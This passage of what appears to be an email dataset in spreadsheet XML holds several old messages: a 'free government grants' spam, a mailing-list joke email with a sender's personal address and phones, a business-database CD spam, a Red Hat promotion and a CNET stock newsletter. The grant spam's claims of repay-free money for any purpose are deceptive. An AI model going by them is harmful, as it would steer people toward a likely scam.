 &lt;span style="font-size: 18.0pt; font-family: Impact; color: #3737FF"&gt;
 &lt;/font&gt;&lt;/a&gt;&lt;/span&gt;&lt;B&gt;&lt;SPAN STYLE="color: rgb(255,0,0);"&gt; 30 DAY MONEY BACK GUARANTEE!&amp;nbsp;
                             &lt;/SPAN&gt;&lt;/B&gt;&lt;span style="font-size: 18.0pt; font-family: Impact; color: #3737FF"&gt;
                             &lt;P STYLE="text-align: justify;"&gt;Can't wait on the mail?
                             You can receive our fabulous Grant Guide Book in one easy Download! Start searching for Grants In Minutes! Simply order your Grant Guide Book today by sending
                             $21.95 Cash, Check or Money Order with your e-mail address enclosed to:&amp;nbsp;
                             &lt;span style="font-size: 18.0pt; font-family: Impact; color: #3737FF"&gt;
                            &lt;/font&gt;&lt;/a&gt;&lt;font size="1" color="#FFFFFF"&gt;&amp;nbsp; &lt;/font&gt;&lt;P STYLE="text-align: justify;"&gt;Government Grants &amp;amp; Loans&amp;nbsp;&lt;BR&gt;
 P.O. Box 101262&amp;nbsp;
                                 &lt;span style="font-size: 18.0pt; font-family: Impact; color: #3737FF"&gt;
                                 &lt;/font&gt;&lt;/a&gt;&lt;/span&gt;&lt;BR&gt;Cape Coral FL 33910&amp;nbsp; &lt;span style="font-size: 18.0pt; font-family: Impact; color: #3737FF"&gt;&lt;/font&gt;
                             &lt;/UL&gt;
                             &lt;P STYLE="text-align: justify;"&gt;Free Cash Grants are being funded by the
                             U.S. Government and Private Foundations each and every day. These Grants are Funded from Your Tax Dollars. The Private Foundations Use the Grants as a Tax Write-Off! This Free Money can be used for any purpose you can imagine. Start a Business, Go to College, Buy a House, Medical Bills, or Even Personal Needs. Learn How to apply for and receive Pell Grants &amp;amp; Scholarships. There is Free Money available for virtually any use including personal! Even learn how to apply for Low Interest and No Interest Government Loans!&lt;/P&gt;
                             &lt;P STYLE="text-align: justify;"&gt;&lt;B&gt;Government Grant Facts:&lt;/B&gt;&lt;BR&gt;Want to start a Business? Or Expand your existing Business? Our Government is Giving away Over 5 Billion dollars in Business grants and low-interest loans. More than 10,000,000 deserving people are getting Free Money to Build their Dreams! What are you waiting for? Let Uncle Sam Finance Your Business Today.&lt;/P&gt;
                             &lt;P STYLE="text-align: justify;"&gt;&lt;B&gt;Attention College Students:&lt;/B&gt;&lt;BR&gt;A huge Amount of money is out there for you. Incredibly enough the U.S. Government does care about Your Education! Over 3 Billion Dollars for College Grants, Pell grants &amp;amp; Scholarships is Given Away. No credit checks or collateral required. Start Applying Online now! There are Low Interest and No Interest Government Loans also Available. There are also Special grants for Research &amp;amp; Technology.&amp;nbsp;
                             &lt;span style="font-size: 18.0pt; font-family: Impact; color: #3737FF"&gt;
                            &lt;font size="1" color="#FFFFFF"&gt;&amp;nbsp; &lt;/font&gt;
 &lt;/font&gt;&lt;/a&gt;&lt;font size="1" color="#FFFFFF"&gt;&amp;nbsp; &lt;/font&gt;
                             &lt;P STYLE="text-align: justify;"&gt;&lt;B&gt;Good News For Women &amp;amp; Minorities:&lt;/B&gt;&lt;BR&gt;Two billon dollars of free money is available for you from starting a business to personal grants. Take Advantage Of this opportunity! This is your tax money, get your share today!&lt;/P&gt;
                             &lt;P STYLE="text-align: justify;"&gt;&lt;B&gt;Purchase Your Dream Home or Get Money for Home Improvements:&amp;nbsp;
                             &lt;/B&gt;&lt;span style="font-size: 18.0pt; font-family: Impact; color: #3737FF"&gt;
 &lt;/span&gt;&lt;BR&gt;Government housing grants, low interest and no interest loans are available. Learn about the FHA; who they are and how they can help you!&amp;nbsp;
                             &lt;span style="font-size: 18.0pt; font-family: Impact; color: #3737FF"&gt;
                             &lt;P STYLE="text-align: justify;"&gt;There are also reserved free government cash grants now available for the following special interest groups:&amp;nbsp;
                             &lt;span style="font-size: 18.0pt; font-family: Impact; color: #3737FF"&gt;
                             &lt;UL&gt;
                                 &lt;LI STYLE="text-align: justify;"&gt;American Indians&amp;nbsp;
                                   &lt;span style="font-size: 18.0pt; font-family: Impact; color: #3737FF"&gt;
                                 &lt;LI STYLE="text-align: justify;"&gt;Veterans &lt;/LI&gt;
                                 &lt;LI STYLE="text-align: justify;"&gt;Family Members of Veterans &lt;/LI&gt;
                                 &lt;LI STYLE="text-align: justify;"&gt;Low Income Families &lt;/LI&gt;
                                 &lt;LI STYLE="text-align: justify;"&gt;Community Block Grants &lt;/LI&gt;
                                 &lt;LI STYLE="text-align: justify;"&gt;Non Profit Organizations &lt;/LI&gt;
                                 &lt;LI STYLE="text-align: justify;"&gt;First Time Home Buyers &lt;/LI&gt;
                                 &lt;LI STYLE="text-align: justify;"&gt;Artists &lt;/LI&gt;
                                 &lt;LI STYLE="text-align: justify;"&gt;Musicians&amp;nbsp;
                                   &lt;span style="font-size: 18.0pt; font-family: Impact; color: #3737FF"&gt;
                                 &lt;LI STYLE="text-align: justify;"&gt;Nurses &lt;/LI&gt;
                                 &lt;LI STYLE="text-align: justify;"&gt;Teachers &lt;/LI&gt;
                                 &lt;LI STYLE="text-align: justify;"&gt;Researchers &lt;/LI&gt;
                                 &lt;LI STYLE="text-align: justify;"&gt;The Disabled &lt;/LI&gt;
                                 &lt;LI STYLE="text-align: justify;"&gt;People Suffering From HIV and AIDS &lt;/LI&gt;
                                 &lt;LI STYLE="text-align: justify;"&gt;Substance Abuse&amp;nbsp;
                                   &lt;span style="font-size: 18.0pt; font-family: Impact; color: #3737FF"&gt;
                                 &lt;LI STYLE="text-align: justify;"&gt;There are literally millions available; all you have to do is ask!&lt;/LI&gt;
                             &lt;/UL&gt;
                             &lt;P STYLE="text-align: justify;"&gt;&lt;B&gt;Attention:&amp;nbsp; &lt;/B&gt;&lt;span style="font-size: 18.0pt; font-family: Impact; color: #3737FF"&gt;
                             &lt;BR&gt;None of these Grants require a credit check, collateral, security deposits or co-signers.&amp;nbsp; You can apply even if you have a bankruptcy or bad credit, it doesn't matter. Its free money, never repay!&amp;nbsp;
                             &lt;span style="font-size: 18.0pt; font-family: Impact; color: #3737FF"&gt;
                             &lt;P STYLE="text-align: justify;"&gt;Our Grant Guide Program Includes:&amp;nbsp;
                                 &lt;LI STYLE="text-align: justify;"&gt;Information on how to write your grant proposal.&amp;nbsp;
                                 &lt;LI STYLE="text-align: justify;"&gt;Complete listing of grants by category &amp;amp; agency! &lt;/LI&gt;
                                 &lt;LI STYLE="text-align: justify;"&gt;Complete listing of college scholarships, grants ! &lt;/LI&gt;
                                 &lt;LI STYLE="text-align: justify;"&gt;Information on amount of funding available! &lt;/LI&gt;
                                 &lt;LI STYLE="text-align: justify;"&gt;Complete Information on low interest &amp;amp; no interest loans!&amp;nbsp;
                                 &lt;LI STYLE="text-align: justify;"&gt;Phone numbers &amp;amp; addresses of grant sources! &lt;/LI&gt;
                             &lt;/UL&gt;
                             &lt;P STYLE="text-align: justify;"&gt;&lt;B&gt;Free Shipping &amp;amp; Handling for A Limited Time!&lt;/B&gt;&lt;BR&gt;
                             &lt;BR&gt;30 DAY MONEY BACK GUARANTEE!&lt;BR&gt; If you do not like our wonderful product for ANY reason and you would like your money back, simply return your order and you will be refunded.&lt;/P&gt;
                             &lt;P STYLE="text-align: justify;"&gt;Order now by sending $21.95 Cash, Check, or Money Order to:&lt;/P&gt;
                             &lt;UL&gt;
                                 &lt;P STYLE="text-align: justify;"&gt;Government Grants &amp;amp; Loans&lt;BR&gt;P.O. Box 101262&lt;BR&gt;Cape Coral FL 33910&lt;/P&gt;
                             &lt;/UL&gt;
                             &lt;P STYLE="text-align: justify;"&gt;&lt;B&gt;Electronic Delivery of Grant Guide:&lt;/B&gt;&lt;BR&gt;Can't wait on snail mail? Copies of the Grant Guide book are also available via E-Mail. When you send off for your fabulous book enclose your e-mail address and we will send the book to your e-mail account A.S.A.P.!
                             &lt;P STYLE="text-align: justify;"&gt;We have assembled a team of highly trained professionals which in turn has created the finest free cash grant program in America. We have dedicated ourselves to providing a quality program that provides not only hundreds of free cash sources but also instructs you in the most important step, and that is the
                             proposal.&lt;BR&gt;&lt;BR&gt;
                             &lt;BR&gt; &lt;BR&gt; &lt;BR&gt;&lt;P align="center"&gt;&lt;span style="font-size: 10.0pt; font-family: Impact; color: #3737FF"&gt;To remove your email address from
                             our mailing list please
                             &lt;a href="http://www.placeurself.html"&gt; Click Here&lt;/a&gt; 
                         &lt;/TD&gt;
                     &lt;/TR&gt;
                     &lt;TR VALIGN=TOP ALIGN=LEFT&gt;
                         &lt;TD COLSPAN=2 HEIGHT=6&gt;
                     &lt;/TR&gt;
                 &lt;/TABLE&gt;
             &lt;/TD&gt;
         &lt;/TR&gt;
     &lt;/TABLE&gt;
     &lt;p&gt;
 &lt;font size="1" color="#FFFFFF"&gt;&amp;nbsp; v&amp;nbsp; v&lt;/font&gt;&lt;/span&gt;&lt;/p&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 ahpvqeqkoacigulvlrcqr
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: Living Love - Another legacy of the 60's
</t>
  </si>
  <si>
    <t xml:space="preserve">draw the pain
 "Ken never wrote about this method, but he often demonstrated it in
 workshops. Let us say you have a physical pain somewhere in your body. You
 draw the pain in the air with your finger, about 30 cm (1 foot) high. Take
 about 60 seconds to trace around the perimeter of the pain, carefully
 listening to the pain to find the precise boundary between where it hurts
 and where it does not. Repeat. You will find that after about 10 minutes of
 this the pain will shift, shrink or disappear. A variant of this is to
 imagine making a 3D model the pain in coloured clay."
 Works!  There's this coworker - a real pain in my ass!  I used my middle
 finger to trace his outline for about 60 seconds.  I listened to him, found
 the boundary, and repeated the motion.  He left my office!
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of
 Stephen D. Williams
 Sent: Thursday, October 03, 2002 5:33 PM
 To: fork@example.com
 Subject: Living Love - Another legacy of the 60's
 Normally, I disdain any kind of mysticism, even when it is associated
 with fairly good ideas.  Just a big turnoff.  A good example would be
 the difference between Yoga/TM and the more scientifically pure, but
 related, relaxation techniques including "betagenics",
 hypnosis/auto-hypnosis, etc.  (This was one of the many topics I
 obsessively absorbed as a teenager.)  Or Tai Chi etc. vs. Tai Bo /
 G-Force Dyno-Staff.
 I have to say however that, having found this while looking for
 something completely unrelated, it has some cute truisms.  I
 particularly like their addiction to non-addiction.  Additionally, the
 Mindprod treehugger site has some interesting quotes, etc.
 To my internal ear, nearly all of these 60's based new-age vernacular
 seem to assume that you are a simple child (of the 60's?) who needs some
 religion-like couching of ideas to relate and internalize.  Very
 irritating, but taken in small doses it's interesting to compare and
 contrast with our (my) modern mental models.
 I found that a few of the principles could be used to explain and
 justify US/UN foreign policy and actions.
 http://mindprod.com/methods.html
 http://members.aol.com/inossence/Kenkey.html
 http://www.mindprod.com/
 (Apologies for the embedded HTML.)
 We create the world we live in.
 A loving person lives in a loving world,
 A hostile person lives in a hostile world.
 Everyone you meet is your mirror.
 You make yourself and others suffer just as much when you take offence
 as when you give offence. To be upset over what you don't have is to
 waste what you do have.
 The past is dead,
 The future is imaginary,
 Happiness can only be
 in the Eternal Now Moment
 How soon will you realize that the only thing you don't have is the
 direct experience that there's nothing you need that you don't have.
 Love a person because he or she is there.
 This is the only reason.
 Happiness happens when your consciousness is not dominated by addictions
 and demands~ and you experience life as a parade of preferences.
 The
 purpose
 of our lives
 is to be free
 of all addictive traps,
 and thus
 become one
 with the ocean of
 Living Love.
 sdw
 --
 sdw@lig.net http://sdw.st
 Stephen D. Williams 43392 Wayside Cir,Ashburn,VA 20147-4622
 703-724-0118W 703-995-0407Fax Dec2001
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: -- USA Business Search CD --
</t>
  </si>
  <si>
    <t xml:space="preserve">SUMMARY:
 Everything you need to know about every registered US Business is on one single CD-ROM. The latest version of the USA Business Search CD contains a wealth of information on 18 million business listings in the US. So whether you're after new business, building or enhancing your own database or simply want cheap quality leads, USA Business Search CD will pinpoint exactly what you are looking for.
 USA Business Search is an easy to use CD-ROM compiled using the most accurate and comprehensive USA Yellow Pages (11.6 million records) and USA Domain Names (6.2 million records) databases. At just $429.00, USA Business Search CD is a cost effective way of generating UNLIMITED leads and spotting opportunities. Unrestricted export capability enables you to import data into your database application. Where else can you get this for $429.00? For the same data InfoUSA will charge you over $600,000.00
 WHAT IS USA BUSINESS SEARCH CD?
 USA Business Search CD gives you unlimited access to search, filter, extract, and import data by the following fields:
 1. USA Businesses/Yellow Pages database:
 Category, SIC Codes/Description, Company Name, Street, City, State, Zip, Phone Number.
 2. USA Domain Names database:
 Domain Name, Company Name, Registrant Name, Registrant Email, Registrant Address, Registrant Phone, Registrant Fax.
 - Over 18 million listings with phone numbers
 - Over 6.7 million contact names with email addresses
 - Over 3 million listings with fax numbers
 Available also complete listings of Canadian, European and Latin American Businesses. Please reply back with the Subject: MORE INFO.
 HOW DOES USA BUSINESS SEARCH WORK?
 Once you purchase USA Business Search CD for $429.00, all data on the CD-ROM can be viewed, printed, exported without any limitations. A built-in Search Engine lets you export information to create new prospect spreadsheets and databases or enhance your current ones.
 WHY USA BUSINESS SEARCH?
 USA Business Search CD is excellent value for money, accurate and easy to use. Quite simply, it is an invaluable sales and marketing tool for companies of any size looking for new business. From marketing and sales through to customer services, USA Business Search can save and make you money:
 - Quickly identify target markets and customers using a variety of criteria
 - Produce cost-effective direct mailing lists instantly
 - Print directly onto labels that can be addressed to key named contacts
 - Create telemarketing campaigns
 - Avoid costly calls to Service Bureaus, simply view the telephone number
 - Clean and enhance your own spreadsheets and databases
 - Find new, more cost-effective suppliers
 HOW TO PLACE THE ORDER?
 We are accepting credit card or check orders. Call us to place the order, or complete the form below, print and fax the form, or mail it to the address below.
 ORDER LINE: 1-786-258-2394
 VIA FAX: 1-305-947-0045
 OR MAIL TO:
 DataNetwork
 16950 North Bay Road, Suite 801
 Miami Beach Beach, FL 33160. USA
 * * * Please copy and paste form order, fill out, print, sign, and mail or fax to us.
 Please Send Me "US BUSINESSES &amp; US DOMAINS CD" for $429.00 (US) plus s/h.
 *Name:
 *Company Name:
 *Shipping Address:
 *City:
 *State/Province:
 *Postal Code:
 *Country:
 *Telephone:
 *Fax:
 *E-mail Address:
 Card Type: MasterCard [ ] Visa [ ] AmEx [ ] Discover [ ]
 *Credit Card Number:
 *Expiration Date:
 *Shipping/Handling: $Free - in the USA, $25.00 - Overnight [ ]; Overseas []; C.O.D. [ ].
 *TOTAL ORDER: $
 *I authorize "0-0 DataNetwork" to charge my credit card for 'US BUSINESSES &amp; US DOMAINS CD' in the amount of $__________ .
 *Date:                                                   *Signature:
 *Name as appears on Card:
 *Billing Address:
 *City, State &amp; Postal Code:
 =========================================================
 We apologize if this message was intrusive.
 We guarantee you will never again hear from us.
 Just click here to be removed &lt;a href="mailto:remove1ink9876@btamail.net.cn?Subject=Remove"&gt;REMOVE&lt;/a&gt; or reply back with Subject REMOVE.
 Thank You.
 * * *
</t>
  </si>
  <si>
    <t xml:space="preserve">Red Hat Linux 8.0 is now available.  Get priority access to the Red Hat
 Linux 8.0 upgrade by subscribing to Red Hat Network Basic service for just
 $60 USD annually.  Get it now:
 https://rhn.redhat.com/network/sales/purchase.pxt
 What does $60 a year get you?
   * Instant ISOs of any Red Hat Linux public release for the duration of
     your subscription.
   * Priority access to updates and ISOs -- no busy signals, no searching
     mirror sites, no waiting.
 What's new in Red Hat Linux 8.0, anyway?
   * A new interface -- a user-friendly desktop with graphical enhancements
     and improved menu organization.
   * The latest Gnu Compiler Collection, gcc-3.2, and a specially tuned
     and tested high-performace kernel, 2.4.18.
   * Cutting-edge web server technology powered by the latest release
     of Apache, 2.0.
   * Updated graphical configuration tools that make setting up a Linux
     server a truly point-and-click experience.
   * A single interface for package selection during and after installation
   * Enhanced personal security, featuring a point-and-click firewall
     tool to protect your system from Internet intruders.
 How do I upgrade once I subscribe to Red Hat Network Basic service?
   * After purchase, you will be directed to the Instant ISO page.
     From there, follow the instructions for downloading and installing
     Red Hat Linux 8.0 from the ISO images.
 Read more at: http://www.redhat.com/software/linux/
 DOWNLOAD 8.0 NOW.
 Subscribe to Red Hat Network Basic and start downloading Red Hat Linux 8.0
 instantly.
 https://rhn.redhat.com/network/sales/purchase.pxt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</si>
  <si>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href="http://clickthru.online.com/Click?q=89-h28bQ-J1ja2Wkq9kUMBXB6W5WWlR"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href="http://clickthru.online.com/Click?q=9e-tWQoQtMQnDilP73HSCN0U7nQUD4R" &gt;My Portfolio&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=b4-aJlbQ6Z1ubRympAqJzDxDXozLCyR" &gt;Broker Reports&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=c9-3OZLQpgkBHpoGWAjg0SxiPZvH6lR" &gt;IPOs&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=de-7tpkQMWawpVQvEMtTbDS-BJjho4R" &gt;Splits&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=f3-LjwgQJOwQsqmzSSCs3CyJqsjeorR" &gt;Messages&lt;/a&gt;&lt;/b&gt;
 &lt;/font&gt;
 &lt;!-- /nav --&gt;
 &lt;p&gt;
 &lt;!-- tech winners --&gt;
 &lt;img src="http://www.cnet.com/i/nl/inv/rhc_win.gif" width=160 height=20 alt="Tech Winners"&gt;&lt;br&gt;
 &lt;table width=160 cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=08-IFoQIRjFBenvn1Kg3F-erCpGY9iR" &gt;TLTOA&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;23.0&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;35.29%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=1d-6KTjIGQFRgqerbERl28NRQSnqQPR" &gt;INFS&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;12.7&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;23.42%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=32-Gx5IIrQ6QHL4tsoDFWVhZSgRXBnR" &gt;JACO&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;4.9&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;22.19%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=48-ggFbIdBskdaiyH0Xl_kj2ZBSJuRR" &gt;TSCM&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;2.92&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;22.18%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=5d-JN-bIK0sQdg2gtHobvZm5yGKIaZR" &gt;XOSY&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;5.5&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;20.88%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /tech winners --&gt;
 &lt;br&gt;
 &lt;!-- tech losers --&gt;
 &lt;img src="http://www.cnet.com/i/nl/inv/rhc_lose.gif" width=160 height=20 alt="Tech Losers"&gt;&lt;br&gt;
 &lt;table width=160 cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=72-R8PHIPUfKEF6R7WrqMtNXjoCKqdR" &gt;AUGT&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;5.239&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-36.88%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=87-izDOQ8naL8SWNTreplrQ8kasp4eR" &gt;BUCA&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;9.26&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-30.64%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=9c-xt6pQanyyWlw_2SlXdIl9Oi-UiyR" &gt;SPIR&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;1.9&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-29.60%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=b1-YjxJQ-0ddxi7WJXr9i_f_B0NLnlR" &gt;RSTO&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;4.95&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-23.26%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=c6-URF9QMLKsFRvh71WdT_pfmeDx04R" &gt;NOVN&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;11.935&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-22.10%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /tech losers --&gt;
 &lt;p&gt;
 &lt;!-- ad --&gt;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17, 2002&lt;/font&gt;&lt;br&gt;
 &lt;!-- /index --&gt;
 &lt;table width="100%" cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td colspan=4 bgcolor="#cccccc"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=db-rmY9QJEKb12fwHpvpmtTwxp6DtrR" &gt;DJIA&lt;/a&gt;&lt;br&gt;8542.48 &amp;nbsp;&lt;font color=#009933&gt;69.37&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=f1-MtTuQpsFWZD0e5hH3XX8owMnerlR" &gt;NASDAQ&lt;/a&gt;&lt;br&gt;1397.25 &amp;nbsp;&lt;font color=#009933&gt;21.99&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=06-fP6uI482xDw5FVqmap_vCgSyiL4R" &gt;S&amp;P 500&lt;/a&gt;&lt;br&gt;906.04 &amp;nbsp;&lt;font color=#009933&gt;5.10&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=1b-wAnhI3N2MVpe9PbQ1U5MauO37xrR" &gt;CNET&amp;nbsp;TECH&lt;/a&gt;&lt;br&gt;1,007.43 &amp;nbsp;&lt;font color="#cc0000"&gt;&lt;font color=#009933&gt;14.52&lt;/font&gt;&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=4&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;/td&gt;&lt;/tr&gt;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gain on Intel, Motorola news&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Although computer chip titan Intel posted lower-than-expected earnings, its upbeat forecast helped lift technology shares Wednesday.
 &lt;p&gt;
 Also boosting the sector was Motorola, which beat expectations for operating earnings and predicted a net profit in the last two quarters of the year. CNET's Tech index rose 14.46 points, or 1.41 percent, to 1,007.37, and the tech-laced Nasdaq composite index tacked on 21.97 points, or 1.6 percent, to 1,397.23.
 &lt;p&gt;
 With aircraft maker Boeing beating the consensus Wall Street earnings estimate, the Dow Jones industrials increased 69.37 points, or 0.82 percent, to 8,542.48. The S&amp;P 500 rose 5.08 points, or 0.56 percent, to 906.02.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href="http://clickthru.online.com/Click?q=30-u8NEIRrWWMvUIv88IeOdSKzjX1iR" &gt;Motorola Sees Profit Rebound &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 CHICAGO - Wireless technology giant Motorola Inc. on Wednesday said it expects to bounce back to a net profit in the third and fourth quarters helped by aggressive cost cutting.
 Motorola, a day after posting the largest quarterly loss in its history, said it expects to achieve earnings of about 2 cents a share in the third quarter and 10 cents in the fourth quarter. The estimated earnings for the second half of the year includes charges of about $215 million related to previously announced restructuring actions.
 The world's second largest mobile phone maker has slashed its work force by more than a third from its peak of 150,000 in August 2000. It said last month it would cut another 7,000 jobs, bringing employment to 93,000 by mid-2003.
 &lt;br&gt;&lt;B&gt;MOTOROLA, INC 15.15 4.27% &lt;/B&gt;
 &lt;p&gt;
 &lt;font size=3&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=45-fNkJIKB6rajyU6J-EDvznhjonlZR" &gt;Apple meets lowered expectations &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
